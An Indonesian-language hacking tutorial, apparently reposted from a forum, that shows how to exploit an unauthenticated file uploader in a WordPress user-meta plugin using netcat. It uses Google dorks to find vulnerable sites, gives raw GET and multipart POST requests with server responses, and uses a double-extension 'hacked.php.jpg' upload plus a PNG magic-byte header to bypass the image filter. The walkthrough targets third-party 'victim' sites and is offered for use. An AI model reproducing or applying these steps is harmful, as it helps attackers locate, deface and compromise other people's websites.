http://www.nofiafitri.com/2012/11/swiss-army-knife-for-tcpip-nc.html
Sekarang kita khusus membahas masalah HTTP Attack saja, itu bug global aja, yg penting alur system kerja socketnya paham.. ok, langsung ja...
Pertama saya mencari bug di exploit-db, ambil secara acak.
Kemudian mencari salah satu web vulnerable di list search engine google.
dengan menggunakan keyword dork tadi. contoh:
- inurl:/wp-content/plugins/user-meta/framework/helper/uploader.php -source -trunk
- intext:user-meta -source -trunk
cari yg mudah aja.
coba membuka webnya dengan method biasa dengan netchat:
Code:
C:\Users\ANASKI>nc www.victim.com 80
GET /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Connection: keep-alivesaya menerima respone dari web tersebut:
Code:
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 07:15:49 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl1-gentoo
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
23
{"error":"No files were uploaded."}
0![[Image: nc-001.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ukRF1Qs1Z_vQRmqklsh-l7p6K0mQ6XuWQ-hOJa-HwtoDaMXYEUm08x41n7Jl9BZ4HBLPrqT4ezMNzu52aIPy7bT2Y41K66Q4Efj3rE0v9AfQ=s0-d)
Ops,, kita udah dapat beberapa informasi mengenai target, ternyata uploadernya tidak membutuhkan authorisasi.
Sekarang kita coba meng-upload file ke target tersebut.
Kita perhatikan HTML reguestnya:
Code:
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="qq" />
<input type="submit" />
</form>kemudian kita sesuain dengan nc nya
Code:
C:\Users\ANASKI>nc www.victim.com 80
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Referer: http://victim.com/user-meta.php
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-length: 204
-----------------------------41184676334
Content-Disposition: form-data; name="qqfile"; filename="exp.php.jpeg"
Content-Type: sound/midi
Hacked by Tester
-----------------------------41184676334--
Code:
HTTP/1.1 400 Bad Request
Date: Mon, 01 Oct 2012 07:46:25 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
Content-Length: 475
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1</pre>
</p>
<hr>
<address>Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o Server at victim.com Port 80</address>
</body></html>berarti ada kesalahan waktu saya menulis reguest melalui nc.
kita periksa lagi.
setelah kita periksa kita ulangi lagi sampe benar penulisannya.
untuk error code saya telah membuat listnya:
![[Image: nc-002.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uVH8kFh8SsQaTZT4HPp5UnpsaEWMZsMridcA3auQAIl_BAtDYN79uKlNf-Exdn3OkoOYfYY_2SgMa8jQ1Ukg6t86vx1T1lnQ1ABkWU_5Y_0w=s0-d)
Kita test lagi:
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 208
-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg
hacked by tester
-----------------------------23281168279961--![[Image: nc-003.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_siy_Z_B1kz_B7xk3ElQEZYCL-EC9E_0Utp5sXMVAn30nmBSS1muertp39IJBQw9wQfiKTEz85tVMwWIuwQlI7MnlZKstWqJNGdJkUtnEhOnA=s0-d)
ternyata benar,,, kemudian kita catat reguest tersebut
Nah sekarang kita coba2 bypass filter imagenya, misal dengan menggunakan header GIF/jpeg/PNG
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 214
-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg
‰PNG hacked by tester
-----------------------------23281168279961--source: http://devilzc0de.org/forum/thread-16855.html